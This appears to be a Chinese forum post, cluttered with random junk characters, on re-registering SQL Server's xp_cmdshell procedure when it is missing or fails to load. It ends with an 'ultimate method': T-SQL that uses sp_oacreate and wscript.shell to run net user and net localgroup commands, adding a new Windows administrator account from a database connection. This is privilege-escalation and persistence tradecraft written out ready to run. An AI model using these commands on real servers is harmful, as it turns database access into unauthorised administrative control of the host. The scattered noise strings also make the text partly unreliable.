/ H* ~( Y" b. N6 c5 W! ~, z) h
6 V$ M( n: ?, }$ ^( k1 未能找到存储过程'master..xpcmdshell'.
/ y( @1 t; e  s4 h7 O- ^: h( I   恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
. i' b; e$ ]: W
1 Y( @( z( ^# @! [% z2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc "xp_cmdshell"
4 K. _+ [* {' D$ i# e第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
) r; h  k$ Y# ~" L# K" Z0 c$ q6 h. B恢复方法：查询分离器连接后,
, q/ |( Z5 B' v1 m9 v1 {第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
' [. G1 B/ z3 J  ~然后按F5键命令执行完毕
( F( T4 b6 k6 M0 q
四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
; A( ]: E. L6 b5 i$ Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'

9 }: a7 F; g# B2 vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'

xp或2003server系统:
2 x" Y! b* R# J$ N* t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
5 V4 b0 t4 k% q( ?" ]6 f) {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
; f+ L1 N1 s% P- d